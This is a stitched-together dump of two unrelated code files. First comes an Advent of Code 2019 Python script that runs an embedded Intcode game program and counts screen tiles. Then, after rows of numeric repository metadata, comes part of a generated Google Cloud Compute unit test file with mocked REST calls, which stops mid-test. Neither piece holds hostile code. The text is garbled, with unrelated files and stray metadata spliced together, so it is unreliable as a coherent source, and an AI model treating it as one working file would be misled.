] | null | null | null |
13-game.py
|
seanbechhofer/advent_of_code_2019
|
0dc4f791c4cf736bd711f50fdb88d2d6fa29d11e
|
[
"CC0-1.0"
] | null | null | null |
import sys
import unittest
from intcode import Machine
INPUT = "1,380,379,385,1008,2119,168858,381,1005,381,12,99,109,2120,1102,1,0,383,1102,0,1,382,21001,382,0,1,21002,383,1,2,21101,37,0,0,1105,1,578,4,382,4,383,204,1,1001,382,1,382,1007,382,37,381,1005,381,22,1001,383,1,383,1007,383,20,381,1005,381,18,1006,385,69,99,104,-1,104,0,4,386,3,384,1007,384,0,381,1005,381,94,107,0,384,381,1005,381,108,1106,0,161,107,1,392,381,1006,381,161,1101,0,-1,384,1106,0,119,1007,392,35,381,1006,381,161,1102,1,1,384,21001,392,0,1,21101,0,18,2,21101,0,0,3,21102,138,1,0,1105,1,549,1,392,384,392,21001,392,0,1,21102,18,1,2,21102,1,3,3,21102,1,161,0,1106,0,549,1101,0,0,384,20001,388,390,1,21001,389,0,2,21102,180,1,0,1105,1,578,1206,1,213,1208,1,2,381,1006,381,205,20001,388,390,1,20102,1,389,2,21102,1,205,0,1105,1,393,1002,390,-1,390,1102,1,1,384,21002,388,1,1,20001,389,391,2,21101,228,0,0,1105,1,578,1206,1,261,1208,1,2,381,1006,381,253,21002,388,1,1,20001,389,391,2,21101,253,0,0,1106,0,393,1002,391,-1,391,1102,1,1,384,1005,384,161,20001,388,390,1,20001,389,391,2,21101,279,0,0,1106,0,578,1206,1,316,1208,1,2,381,1006,381,304,20001,388,390,1,20001,389,391,2,21101,0,304,0,1106,0,393,1002,390,-1,390,1002,391,-1,391,1101,1,0,384,1005,384,161,21001,388,0,1,20102,1,389,2,21101,0,0,3,21102,338,1,0,1105,1,549,1,388,390,388,1,389,391,389,20102,1,388,1,21002,389,1,2,21102,4,1,3,21101,0,365,0,1105,1,549,1007,389,19,381,1005,381,75,104,-1,104,0,104,0,99,0,1,0,0,0,0,0,0,270,16,15,1,1,18,109,3,22102,1,-2,1,22102,1,-1,2,21101,0,0,3,21101,0,414,0,1105,1,549,21202,-2,1,1,22101,0,-1,2,21101,429,0,0,1106,0,601,2102,1,1,435,1,386,0,386,104,-1,104,0,4,386,1001,387,-1,387,1005,387,451,99,109,-3,2105,1,0,109,8,22202,-7,-6,-3,22201,-3,-5,-3,21202,-4,64,-2,2207,-3,-2,381,1005,381,492,21202,-2,-1,-1,22201,-3,-1,-3,2207,-3,-2,381,1006,381,481,21202,-4,8,-2,2207,-3,-2,381,1005,381,518,21202,-2,-1,-1,22201,-3,-1,-3,2207,-3,-2,381,1006,381,507,2207,-3,-4,381,1005,381,540,21202,-4,-1,-1,22201,-3,-1,-3,2207,-3,-4,381,1006,381,529,22102,1,-3,-7,109,-8,2105,1,0,109,4,1202,-2,37,566,201,-3,566,566,101,639,566,566,1202,-1,1,0,204,-3,204,-2,204,-1,109,-4,2105,1,0,109,3,1202,-1,37,593,201,-2,593,593,101,639,593,593,21002,0,1,-2,109,-3,2106,0,0,109,3,22102,20,-2,1,22201,1,-1,1,21102,1,373,2,21102,642,1,3,21101,0,740,4,21102,1,630,0,1106,0,456,21201,1,1379,-2,109,-3,2106,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,2,2,2,0,2,2,2,2,2,2,0,0,2,2,2,2,2,2,2,2,2,2,2,0,0,2,2,0,0,0,2,0,1,1,0,2,2,0,0,2,0,2,0,0,0,2,2,2,2,2,2,0,2,2,2,2,2,2,0,2,2,0,2,0,2,0,2,2,0,1,1,0,2,2,0,2,0,2,2,2,2,2,0,0,0,0,2,0,2,2,0,2,0,2,2,2,0,0,2,2,2,2,2,0,2,0,1,1,0,2,0,0,0,2,2,0,2,2,2,2,0,2,2,2,2,2,2,0,2,2,0,2,2,2,2,2,2,2,0,2,2,0,0,1,1,0,0,0,0,2,0,2,2,2,0,0,2,2,2,2,2,2,0,0,2,0,0,2,2,2,2,2,2,2,2,2,2,2,2,0,1,1,0,0,0,2,2,2,0,2,2,2,0,2,2,2,0,2,2,2,0,2,0,2,0,2,0,2,2,2,2,0,2,0,2,2,0,1,1,0,2,0,2,2,2,2,0,2,0,0,0,0,2,2,2,2,2,0,0,0,2,2,2,2,0,2,2,2,0,0,0,2,2,0,1,1,0,2,0,0,2,0,0,2,2,0,2,2,2,2,2,2,0,2,0,2,2,2,2,2,0,2,2,0,2,2,2,2,2,2,0,1,1,0,2,2,2,2,2,0,2,2,2,2,2,0,2,2,2,2,2,2,2,2,2,2,2,2,0,2,2,0,0,2,0,0,0,0,1,1,0,2,2,0,2,2,2,2,2,2,2,2,2,2,0,2,0,2,2,0,0,2,0,2,2,2,2,2,2,2,2,2,2,2,0,1,1,0,0,0,0,2,0,2,2,2,0,2,0,0,2,2,2,0,2,2,0,2,2,2,2,2,0,2,2,2,2,2,0,2,0,0,1,1,0,2,2,0,0,2,0,2,0,0,0,0,2,0,2,2,2,2,0,0,0,2,2,0,0,2,2,2,0,2,2,2,2,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,27,7,12,9,29,89,22,25,56,68,11,72,19,45,14,13,78,3,69,94,27,9,49,28,71,46,36,48,68,13,97,58,28,79,14,17,54,51,27,52,90,90,3,20,46,50,15,13,15,12,56,49,24,85,68,84,48,19,74,5,70,9,64,50,53,5,63,54,90,67,74,95,40,39,25,91,48,87,66,36,17,18,48,24,81,86,24,63,36,29,48,23,19,43,34,97,78,94,51,49,41,47,33,65,76,97,34,78,90,54,20,38,15,78,75,40,60,31,89,98,57,52,39,89,27,51,67,92,75,24,14,26,40,84,22,49,36,8,80,6,69,46,83,80,70,34,29,39,82,26,72,29,47,33,48,92,8,89,49,96,39,13,33,75,48,63,62,71,49,17,57,95,96,34,35,73,53,48,55,95,47,93,80,90,67,32,69,52,15,12,42,62,48,37,80,72,79,37,24,24,77,12,94,62,29,36,32,98,55,82,17,73,26,29,88,21,94,73,30,41,46,65,25,9,67,85,40,92,20,33,55,75,78,44,61,64,41,84,44,21,25,41,95,26,6,43,29,7,31,79,1,93,23,89,25,47,24,57,44,66,83,1,7,11,44,73,96,24,71,66,47,17,42,71,82,5,65,52,18,20,90,85,57,32,80,10,60,65,13,32,51,68,29,67,84,28,13,53,44,41,69,84,76,31,31,57,74,51,44,16,49,80,71,29,78,53,94,60,24,57,9,76,12,54,65,32,30,72,2,91,98,29,28,91,7,84,24,18,12,79,11,34,51,18,98,3,68,38,15,82,53,56,57,18,50,61,95,15,63,3,17,66,80,29,56,4,42,57,82,84,35,8,15,47,4,20,5,50,51,50,48,20,67,77,51,91,81,83,3,79,44,71,82,48,45,43,27,28,42,15,89,21,6,8,80,14,7,90,46,15,90,54,14,1,40,42,78,82,53,82,11,54,95,57,81,29,52,35,86,72,26,54,24,40,22,50,31,33,6,23,45,57,77,43,21,40,84,57,12,67,3,31,90,16,10,64,38,97,59,15,80,44,36,61,33,89,38,67,14,91,34,16,37,77,69,60,58,53,19,79,90,79,4,68,60,4,39,33,8,50,61,5,29,39,65,72,70,34,56,74,21,58,73,20,95,63,97,73,74,91,80,67,38,25,54,90,97,81,52,43,55,12,85,78,71,42,76,50,16,61,81,82,61,30,48,67,15,38,93,1,12,20,18,82,15,17,78,60,94,48,18,7,10,26,33,70,46,79,8,93,29,53,32,15,79,83,1,84,23,30,95,55,36,47,20,93,56,41,5,73,42,68,8,14,41,61,43,34,40,17,52,23,61,27,51,27,77,34,14,3,42,20,97,13,33,16,96,43,42,11,67,9,94,50,45,19,48,59,2,16,38,3,97,59,70,21,86,95,24,34,49,60,43,4,94,44,6,42,21,51,6,39,1,76,17,15,75,43,39,14,61,93,49,45,38,92,60,58,49,17,8,57,77,31,48,43,17,8,89,37,17,19,23,9,17,28,44,2,83,61,84,83,43,8,80,71,56,15,16,17,46,14,85,92,75,58,71,83,7,13,92,27,39,56,21,24,20,31,65,34,4,37,9,95,21,53,93,19,78,88,12,46,76,77,37,16,5,43,13,68,1,67,98,13,55,70,57,77,13,92,168858"
# Steps to increment for each code
def debug(arg):
#pass
print(arg)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def draw_screen(data):
screen = {}
for triple in chunks(data,3):
screen[(triple[0],triple[1])] = triple[2]
debug(triple)
return screen
if __name__=='__main__':
# unittest.main()
program = [int(s) for s in INPUT.split(",")]
machine = Machine()
machine.memory = program.copy()
machine.counter = 0
machine.io = {'input': [], 'output': []}
while (machine.execute_instruction()):
pass
print(machine.io)
screen = draw_screen(machine.io['output'])
print(screen)
print(len([x for x in screen.values() if x == 2]))
| 189.194444
| 5,943
| 0.626927
| 2,240
| 6,811
| 1.901339
| 0.107589
| 0.141348
| 0.175393
| 0.211317
| 0.2888
| 0.268138
| 0.227283
| 0.217187
| 0.209204
| 0.168819
| 0
| 0.568633
| 0.032007
| 6,811
| 35
| 5,944
| 194.6
| 0.077355
| 0.014388
| 0
| 0
| 0
| 0.037037
| 0.88874
| 0.884862
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0.037037
| 0.111111
| 0
| 0.259259
| 0.148148
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1a0b896401e260a155cf48b8d5d852fde0f7acce
| 167,946
|
py
|
Python
|
tests/unit/gapic/compute_v1/test_region_instance_group_managers.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/compute_v1/test_region_instance_group_managers.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/compute_v1/test_region_instance_group_managers.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests import Request
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.region_instance_group_managers import (
RegionInstanceGroupManagersClient,
)
from google.cloud.compute_v1.services.region_instance_group_managers import pagers
from google.cloud.compute_v1.services.region_instance_group_managers import transports
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert RegionInstanceGroupManagersClient._get_default_mtls_endpoint(None) is None
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(api_endpoint)
== api_mtls_endpoint
)
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(
sandbox_mtls_endpoint
)
== sandbox_mtls_endpoint
)
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(non_googleapi)
== non_googleapi
)
@pytest.mark.parametrize("client_class", [RegionInstanceGroupManagersClient,])
def test_region_instance_group_managers_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name",
[(transports.RegionInstanceGroupManagersRestTransport, "rest"),],
)
def test_region_instance_group_managers_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [RegionInstanceGroupManagersClient,])
def test_region_instance_group_managers_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
def test_region_instance_group_managers_client_get_transport_class():
transport = RegionInstanceGroupManagersClient.get_transport_class()
available_transports = [
transports.RegionInstanceGroupManagersRestTransport,
]
assert transport in available_transports
transport = RegionInstanceGroupManagersClient.get_transport_class("rest")
assert transport == transports.RegionInstanceGroupManagersRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
),
],
)
@mock.patch.object(
RegionInstanceGroupManagersClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(RegionInstanceGroupManagersClient),
)
def test_region_instance_group_managers_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(
RegionInstanceGroupManagersClient, "get_transport_class"
) as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(
RegionInstanceGroupManagersClient, "get_transport_class"
) as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
"true",
),
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
"false",
),
],
)
@mock.patch.object(
RegionInstanceGroupManagersClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(RegionInstanceGroupManagersClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_region_instance_group_managers_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
),
],
)
def test_region_instance_group_managers_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
),
],
)
def test_region_instance_group_managers_client_client_options_credentials_file(
client_class, transport_class, transport_name
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_abandon_instances_rest(
transport: str = "rest",
request_type=compute.AbandonInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_abandon_instances_request_resource"
] = compute.RegionInstanceGroupManagersAbandonInstancesRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.abandon_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_abandon_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.AbandonInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_abandon_instances_request_resource"
] = compute.RegionInstanceGroupManagersAbandonInstancesRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.abandon_instances(request)
def test_abandon_instances_rest_from_dict():
test_abandon_instances_rest(request_type=dict)
def test_abandon_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_abandon_instances_request_resource=compute.RegionInstanceGroupManagersAbandonInstancesRequest(
instances=["instances_value"]
),
)
mock_args.update(sample_request)
client.abandon_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/abandonInstances"
% client.transport._host,
args[1],
)
def test_abandon_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.abandon_instances(
compute.AbandonInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_abandon_instances_request_resource=compute.RegionInstanceGroupManagersAbandonInstancesRequest(
instances=["instances_value"]
),
)
def test_apply_updates_to_instances_rest(
transport: str = "rest",
request_type=compute.ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_apply_updates_request_resource"
] = compute.RegionInstanceGroupManagersApplyUpdatesRequest(all_instances=True)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.apply_updates_to_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
